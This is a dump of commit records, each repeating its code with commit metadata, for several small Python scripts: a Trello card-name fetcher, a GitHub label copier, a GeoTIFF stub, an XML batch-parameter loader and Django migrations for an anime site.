from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
|
619533b0cc5426e2680626fdeb2f33a98b8fec89
|
scripts/trello-description.py
|
scripts/trello-description.py
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
Create script to fetch trello name from a list of trello ids
|
Create script to fetch trello name from a list of trello ids
|
Python
|
mit
|
uktrade/data-hub-fe-beta2,uktrade/data-hub-fe-beta2,uktrade/data-hub-frontend,uktrade/data-hub-frontend,uktrade/data-hub-frontend
|
Create script to fetch trello name from a list of trello ids
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
<commit_before><commit_msg>Create script to fetch trello name from a list of trello ids<commit_after>
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
Create script to fetch trello name from a list of trello idsimport requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
<commit_before><commit_msg>Create script to fetch trello name from a list of trello ids<commit_after>import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
|
49e79f41542702dd2409d4a5fbbad28a2c88341b
|
copy_labels.py
|
copy_labels.py
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
Copy labels from edx-platform to all the other repos
|
Copy labels from edx-platform to all the other repos
|
Python
|
apache-2.0
|
edx/repo-tools,edx/repo-tools
|
Copy labels from edx-platform to all the other repos
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
<commit_before><commit_msg>Copy labels from edx-platform to all the other repos<commit_after>
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
Copy labels from edx-platform to all the other repos#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
<commit_before><commit_msg>Copy labels from edx-platform to all the other repos<commit_after>#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
|
5859a9fe249025e9175bfc1cbd845adaa371d590
|
backend/generateGeotiff.py
|
backend/generateGeotiff.py
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
Add script for generating Geotiff
|
Add script for generating Geotiff
|
Python
|
mit
|
lukefi/missamustikka,lukefi/missamustikka,lukefi/missamustikka
|
Add script for generating Geotiff
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
<commit_before><commit_msg>Add script for generating Geotiff<commit_after>
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
Add script for generating Geotiff
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
<commit_before><commit_msg>Add script for generating Geotiff<commit_after>
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
|
c5a027748275d9b9065fd89be60d6b97a27fd3ed
|
Simulation/InterpretBatchParamsXML.py
|
Simulation/InterpretBatchParamsXML.py
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
Add beta ability to load params from xml
|
Add beta ability to load params from xml
|
Python
|
mit
|
ram8647/tcseg,ram8647/tcseg,ram8647/tcseg
|
Add beta ability to load params from xml
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
<commit_before><commit_msg>Add beta ability to load params from xml<commit_after>
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
Add beta ability to load params from xmlfrom xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
<commit_before><commit_msg>Add beta ability to load params from xml<commit_after>from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
|
3caef811ab9f60988dd06bc2161f373b61bb9c8d
|
mangaki/mangaki/migrations/0013_auto_20150616_0919.py
|
mangaki/mangaki/migrations/0013_auto_20150616_0919.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
Add attributes to Anime migration
|
Add attributes to Anime migration
|
Python
|
agpl-3.0
|
RaitoBezarius/mangaki,Mako-kun/mangaki,Elarnon/mangaki,RaitoBezarius/mangaki,Elarnon/mangaki,Mako-kun/mangaki,Mako-kun/mangaki,Elarnon/mangaki,RaitoBezarius/mangaki
|
Add attributes to Anime migration
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add attributes to Anime migration<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
Add attributes to Anime migration# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
